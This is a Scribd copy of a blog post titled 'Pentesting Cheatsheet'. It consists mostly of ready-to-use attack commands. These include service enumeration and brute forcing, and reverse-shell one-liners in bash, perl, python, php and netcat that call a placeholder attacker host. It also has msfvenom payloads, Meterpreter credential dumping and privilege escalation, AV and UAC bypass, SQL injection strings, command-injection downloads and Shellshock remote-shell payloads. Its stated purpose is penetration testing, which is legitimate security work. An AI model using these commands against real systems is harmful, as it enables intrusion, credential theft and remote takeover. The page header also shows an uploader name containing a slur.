KEMBAR78
Pentesting Cheatsheet | PDF | Software | Computing
0% found this document useful (0 votes)
26 views33 pages

Pentesting Cheatsheet

The document is a comprehensive pentesting cheatsheet that provides various commands and scripts for enumeration, exploitation, and post-exploitation tasks across different protocols and services. It includes specific Nmap commands for scanning, techniques for password cracking, and methods for creating reverse shells using multiple programming languages. Additionally, it covers the use of Metasploit and Meterpreter for advanced exploitation and payload generation.

Uploaded by

faggotkilla
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
26 views33 pages

Pentesting Cheatsheet

The document is a comprehensive pentesting cheatsheet that provides various commands and scripts for enumeration, exploitation, and post-exploitation tasks across different protocols and services. It includes specific Nmap commands for scanning, techniques for password cracking, and methods for creating reverse shells using multiple programming languages. Additionally, it covers the use of Metasploit and Meterpreter for advanced exploitation and payload generation.

Uploaded by

faggotkilla
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 33

Home About me Contact 

Blog Simple. 

Pentesting Cheatsheet
In Security Tags hacking, pentest, security November 16, 2017 3824 Views Aishee

Enumeration

General Enumeration:
nmap -vv -Pn -A -sC -sS -T 4 -p- 10.0.0.1

nmap -v -sS -A -T4 x.x.x.x // Verbose, SYN Stealth, Version info, and scripts against

services.
nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.1.X //

Nmap script to scan for vulnerable SMB servers – WARNING: unsafe=1 may cause
knockover
netdiscover -r 192.168.1.0/24

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
FTP Enumeration (21):
nmap –script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-

backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 10.0.0.1

SSH (22):
nc INSERTIPADDRESS 22

SMTP Enumeration (25):


nmap –script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-

cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.0.0.1

nc -nvv INSERTIPADDRESS 25

telnet INSERTIPADDRESS 25

Finger Enumeration (79):


Download script and run it with a wordlist: http://pentestmonkey.net/tools/user-
enumeration/ nger-user-enum

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Web Enumeration (80/443):
dirbuster (GUI)
nikto –h 10.0.0.1

Pop3 (110):
telnet INSERTIPADDRESS 110

USER anounys@INSERTIPADDRESS

PASS admin

or:

USER anounys

PASS admin

RPCBind (111):
rpcinfo –p x.x.x.x

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
SMB\RPC Enumeration (139/445):
enum4linux –a 10.0.0.1

nbtscan x.x.x.x // Discover Windows / Samba servers on subnet, nds Windows MAC

addresses, netbios name and discover client workgroup / domain


py 192.168.XXX.XXX 500 50000 dict.txt

python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX

nmap IPADDR --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-

processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-

ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-

psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-

vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-

ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-

061.nse,smb-vuln-regsvc-dos.nse

smbclient -L INSERTIPADDRESS

smbclient //INSERTIPADDRESS/tmp

smbclient INSERTIPADDRESS ipc$ -U john

SNMP Enumeration (161):


snmpwalk -c public -v1 10.0.0.0

snmpcheck -t 192.168.1.X -c public

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
onesixtyone -c names -i hosts

python /usr/share/doc/python-impacket-doc/examples/samrdump.py SNMP

192.168.X.XXX

nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt

snmpenum -t 192.168.1.X

Oracle (1521):
tnscmd10g version -h INSERTIPADDRESS

tnscmd10g status -h INSERTIPADDRESS

Mysql Enumeration (3306):


nmap -sV -Pn -vv 10.0.0.1 -p 3306 --script mysql-audit,mysql-databases,mysql-

dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-

users,mysql-variables,mysql-vuln-cve2012-2122

DNS Zone Transfers:


nslookup -> set type=any -> ls -d xxx.com

dig axfr xxxx.com @ns1.xxx.com

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml //

Recon

Mounting File Share


showmount -e IPADDR
mount 192.168.1.1:/vol/share /mnt/nfs -nolock // mounts the share to /mnt/nfs

without locking it
mount -t cifs -o username=user,password=pass, domain=xxx //192.168.1.X/share-

name /mnt/cifs // Mount Windows CIFS / SMB share on Linux at /mnt/cifs if you remove

password it will prompt on the CLI (more secure as it wont end up in bash_history)
net use Z: \\win-server\share password /user:domain\janedoe /savecred /p:no //

Mount a Windows share on Windows from the command line


apt-get install smb4k –y // Install smb4k on Kali, useful Linux GUI for browsing SMB

shares

Fingerprinting: Basic versioning / nger printing via displayed


banner
nc -v 192.168.1.1 25

telnet 192.168.1.1 25

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Exploit Research
searchsploit windows 2003 | grep -i local // Search exploit-db for exploit, in this

example windows 2003 + local esc

Compiling Exploits
gcc -o exploit exploit.c // Compile C code, add –m32 after ‘gcc’ for compiling 32 bit

code on 64 bit Linux


i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe // Compile windows .exe

on Linux

Packet Inspection:
tcpdump tcp port 80 -w output.pcap -i eth0 // tcpdump for port 80 on interface eth0,

outputs to output.pcap

Password Cracking
Use hash-identi er to determine the hash type.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
https://hashkiller.co.uk

Paste the entire /etc/shadow le in a test le and run john with the text le after john.

john hashes.txt

hashcat -m 500 -a 0 -o output.txt –remove hashes.txt

/usr/share/wordlists/rockyou.txt

Bruteforcing:
hydra 10.0.0.1 http-post-form

“/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid” -P

/usr/share/wordlists/rockyou.txt -l admin

hydra -l admin -P /usr/share/wordlists/rockyou.txt -o results.txt IPADDR

PROTOCOL

hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp –V // Hydra SMTP Brute

force

Shells & Reverse Shells

SUID C Shells
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
bin/bash:

int main(void){

setresuid(0, 0, 0);

system(“/bin/bash”);

bin/sh:

int main(void){

setresuid(0, 0, 0);

system(“/bin/sh”);

gcc -o suid suid.c

TTY Shell:
python -c 'import pty;pty.spawn("/bin/bash")'

echo os.system('/bin/bash')

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
/bin/sh –i

execute('/bin/sh') // LUA

!sh // NMAP

:!bash // Vi

Spawn Ruby Shell


exec "/bin/sh" // TTY

ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh

-i <&%d >&%d

Netcat
nc -e /bin/sh ATTACKING-IP 80

/bin/sh | nc ATTACKING-IP 80

rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p

Telnet Reverse Shell


rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p

telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
PHP
php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'

(Assumes TCP uses le descriptor 3. If it doesn’t work, try 4,5, or 6)

Bash
exec /bin/bash 0&0 2>&0

0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196

exec 5<>/dev/tcp/ATTACKING-IP/80 cat <&5 | while read line; do $line 2>&5 >&5;

done

# or: while read line 0<&5; do $line 2>&5 >&5; done

bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1

Perl
exec "/bin/sh";

perl —e 'exec "/bin/sh";'

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
perl -e 'use Socket;$i="ATTACKING-

IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,socka

ddr_in($p,inet_aton($i))))

{open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN-

>fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' // Windows

perl -e 'use Socket;$i="ATTACKING-

IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,socka

ddr_in($p,inet_aton($i))))

{open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -

i");};' // Windows

Meterpreter

Windows reverse meterpreter payload


set payload windows/meterpreter/reverse_tcp // Windows reverse tcp payload

Windows VNC Meterpreter payload


set payload windows/vncinject/reverse_tcp // Meterpreter Windows VNC Payload

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
set ViewOnly false

Linux Reverse Meterpreter payload


set payload linux/meterpreter/reverse_tcp // Meterpreter Linux Reverse Payload

Meterpreter Cheat Sheet


upload file c:\\windows // Meterpreter upload le to Windows target

download c:\\windows\\repair\\sam /tmp // Meterpreter download le from Windows

target
download c:\\windows\\repair\\sam /tmp // Meterpreter download le from Windows

target
execute -f c:\\windows\temp\exploit.exe // Meterpreter run .exe on target – handy for

executing uploaded exploits


execute -f cmd -c // Creates new channel with cmd shell

ps // Meterpreter show processes

shell // Meterpreter get shell on the target

getsystem // Meterpreter attempts priviledge escalation the target

hashdump // Meterpreter attempts to dump the hashes on the target

portfwd add –l 3389 –p 3389 –r target // Meterpreter create port forward to target

machine

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
portfwd delete –l 3389 –p 3389 –r target // Meterpreter delete port forward

use exploit/windows/local/bypassuac // Bypass UAC on Windows 7 + Set target + arch,

x86/64
use auxiliary/scanner/http/dir_scanner // Metasploit HTTP directory scanner

use auxiliary/scanner/http/jboss_vulnscan // Metasploit JBOSS vulnerability scanner

use auxiliary/scanner/mssql/mssql_login // Metasploit MSSQL Credential Scanner

use auxiliary/scanner/mysql/mysql_version // Metasploit MSSQL Version Scanner

use auxiliary/scanner/oracle/oracle_login // Metasploit Oracle Login Module

use exploit/multi/script/web_delivery // Metasploit powershell payload delivery

module
post/windows/manage/powershell/exec_powershell // Metasploit upload and run

powershell script through a session


use exploit/multi/http/jboss_maindeployer // Metasploit JBOSS deploy

use exploit/windows/mssql/mssql_payload // Metasploit MSSQL payload

run post/windows/gather/win_privs // Metasploit show privileges of current user

use post/windows/gather/credentials/gpp // Metasploit grab GPP saved passwords

load mimikatz -> wdigest // Metasplit load Mimikatz

run post/windows/gather/local_admin_search_enum // Idenitfy other machines that the

supplied domain user has administrative access to


set AUTORUNSCRIPT post/windows/manage/migrate

Meterpreter Payloads

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
msfvenom –l // List options

Binaries
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe

msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho

Web Payloads
msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT= -f raw > shell.php

// PHP
set payload php/meterpreter/reverse_tcp //Listener
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >>

shell.php // PHP
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp

// ASP
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp // JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war // WAR

Scripting Payloads

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py // Python

msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh // Bash

msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl // Perl

Shellcode
For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters.
Msfvenom will output code that is able to be cut and pasted in this language for your exploits.

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f

msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f

Handlers
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive
your incoming shells. Handlers should be in the following format.

exploit/multi/handler

set PAYLOAD

set LHOST

set LPORT

set ExitOnSession false

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
exploit -j -z

An example is: msfvenom exploit/multi/handler -p windows/meterpreter/reverse_tcp

LHOST= LPORT= -f > exploit.extension

Powershell
Execution Bypass

Set-ExecutionPolicy Unrestricted
iex(new-object system.net.webclient).downloadstring(“ le:///C:\example le.ps1”)

Powershell.exe blocked

Use ‘not powershell’ https://github.com/Ben0xA/nps

PS1 File blocked

iex(new-object system.net.webclient).downloadstring(“ le:///C:\example le.doc”)


Invoke-example le #This allows execution of any le extension

Privilege Escalation

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Linux:
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

https://github.com/pentestmonkey/unix-privesc-check

Windows:
https://github.com/pentestmonkey/windows-privesc-check

http://www.fuzzysecurity.com/tutorials/16.html

https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/

Command Injection

File Traverse:

1 website.com/file.php[?path=/]

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Test HTTP options using curl:

1 curl -vX OPTIONS [website]

Upload le using CURL to website with PUT option available

1 curl --upload-file shell.php --url http://192.168.218.139/test/shell.php --http1.0

Transfer le (Try temp directory if not writable)(wget -O tells it


where to store):

1 ?path=/; wget http://IPADDRESS:8000/FILENAME.EXTENTION;

Activate shell le:

1 ; php -f filelocation.php;

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
SQLInjections

Common Injections for Login Forms:


admin' --

admin' #

admin'/*

' or 1=1--

' or 1=1#

' or 1=1/*

') or '1'='1--

') or ('1'='1—

SQLMap
s qlmap -u http://xxx.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --
level=5 --risk=3 // Automated sqlmap scan
sqlmap -u http://INSERTIPADDRESS --dbms=mysql --crawl=3

sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-

user --current-db --passwords --file-read="/var/www/xxx.php" // Targeted sqlmap

scan

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
sqlmap -u "http://xxx.com/xxx.php?id=1" --dbms=mysql --tech=U --random-agent --

dump // Scan url for union + error based injection with mysql backend and use a random

user agent + database dump


sqlmap -o -u "http://xxx.com/form/" –forms // sqlmap check form for injection

sqlmap -o -u "http://xxx/vuln-form" --forms -D database-name -T users –dump //

sqlmap dump and crack hashes for table users on database-name.


sqlmap --flush session

Flushes the session


sqlmap -p user --technique=B

Attempts to exploit the “user” eld using boolean technique.

Miscellaneous
Tunneling:

sshuttle -r root@10.0.0.1 10.10.10.0/24

sshuttle is an awesome tunneling tool that does all the hard work for you. It gets rid of the need
for proxy chains. What this command does is tunnels traf c through 10.0.0.1 and makes a route
for all traf c destined for 10.10.10.0/24 through your sshuttle tunnel.

AV Bypass:

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
root@kali:~/Hyperion-1.0# wine hyperion.exe ../backdoor.exe ../backdoor_mutation.exe
(This is a general example of how to evade AV)

Web hosts

python -m SimpleHTTPServer 80 // Basic HTTP Server

service apache2 start // Starts Apache web server. Place les in /var/www/html to be

able to ‘wget’ them.

Php Meterpreter Shell (Remove Guard bit)


msfvenom -p php/meterpreter/reverse_tcp LHOST=????????? LPORT=6000 R >

phpmeterpreter.php

Netcat
Listener: nc -lp PORT
Target: ; nc -e /bin/bash listeneripaddress listenerport | or ncat -v -l -p 7777
-e /bin/bash

Host: cat happy.txt | ncat -v -l -p 5555 Target: ncat localhost 5555 >
happy_copy.txt // download le via ncat

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Reverse shell using interpreters (http://pentestmonkey.net/cheat-
sheet/shells/reverse-shell-cheat-sheet)
e: python -c python -c 'import

socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connec

t(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);

os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

python -c "exec(\"import socket, subprocess;s =

socket.socket();s.connect(('127.0.0.1',9000))\nwhile 1: proc =

subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE,

stderr=subprocess.PIPE,

stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"

Shellshock
curl -x TARGETADDRESS -H "User-Agent: () { ignored;};/bin/bash -i >&

/dev/tcp/HOSTIP/1234 0>&1" TARGETADDRESS/cgi-bin/status

curl -x 192.168.28.167:PORT -H "User-Agent: () { ignored;};/bin/bash -i >&

/dev/tcp/192.168.28.169/1234 0>&1" 192.168.28.167/cgi-bin/status

ssh username@IPADDRESS '() { :;}; /bin/bash' //Shellshock over SSH

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Resources & Links

Windows Privilege Escalation


http://www.fuzzysecurity.com/tutorials/16.html

https://toshellandback.com/2015/11/24/ms-priv-esc/

SQL & Apache Log paths


http://www.itninja.com/blog/view/mysql-and-apache-pro le-log-path-locations

Recon
https://bitvijays.github.io/blog/2015/04/09/learning-from-the- eld-intelligence-gathering/

Cheat Sheets (Includes scripts):


http://pentestmonkey.net/

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
https://highon.coffee/blog/cheat-sheet/

https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/

Meterpreter Stu
http://netsec.ws/?p=331

Proxy Chaining
apt-get install sshuttle

https://github.com/sshuttle/sshuttle

https://github.com/ro 0r/proxychains-ng

https://www.offensive-security.com/metasploit-unleashed/proxytunnels/

Huge collection of common commands and scripts as well as


general pentest info
https://bobloblaw.gitbooks.io/security/content/

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Scripts
https://github.com/rebootuser/LinEnum

https://github.com/mzet-/linux-exploit-suggester

https://github.com/azmatt/windowsEnum

https://github.com/leebaird/discover

https://nmap.org/nsedoc/

Pentester Bookmarks, huge collection of blogs, forums, and


resources.
https://code.google.com/archive/p/pentest-
bookmarks/wikis/BookmarksList.wihttps://blog.g0tmi1k.com/2011/08/basic-linux-privilege-
escalation/

      

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Aishee

Previous Post:
 Flow pentest

Next Post:
Lẻ tẻ bounty 

Related Posts:

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Vulnerability Export Injection

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
SUDO và quyền lực thế giới ngầm – Leo thang đặc quyền trên Linux

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
VStar IP Camera Analysis – Đừng tha em đêm nay!

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Leave a reply:

Your email address will not be published.

Name

Email

Website

Post Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
About Me

My name is Nguyen Anh Tai. I am an independent security researcher, bug hunter and leader a security team.
Security Researcher at CMC INFOSEC. I developed the every system for fun :D. My aim is to become an expert
in security and xxx!

Tags

Android aslr attack botnet bounty bug burp suite cache ddos

dns export injection Fortify gzip hack hacking hackings HP Fortify SCA

html5 html injection iftop iptraf js injection kernel log linux Machine

Learning malware memcached Mirai monitor password pentest pentestit

pentest tool Privilege ps ps command security subdomain token unix

unprivileged URL malicious waf webstorage webview

Tweets

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Aishee RT @cyb3rops: Oh my gosh, this is the noisiest RAT that I've ever seen. Drops .js, .ps1, .bat, .exe, .exe as .jpg,
ssh service, TeamViewer,…
about 18 days ago   

 Aishee RT @axi0mX: EPIC JAILBREAK: Introducing checkm8 (read "checkmate"), a permanent unpatchable bootrom
exploit for hundreds of millions of iOS…
about 19 days ago   

 Aishee 7% through "The Simulation Hypothesis: An MIT…" by Rizwan Virk. Try the book for free:
https://t.co/iaDzmZri9Y https://t.co/oq5dvJoUyr
about 4 months ago   

Make by Aishee - A blog simple for social

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD

You might also like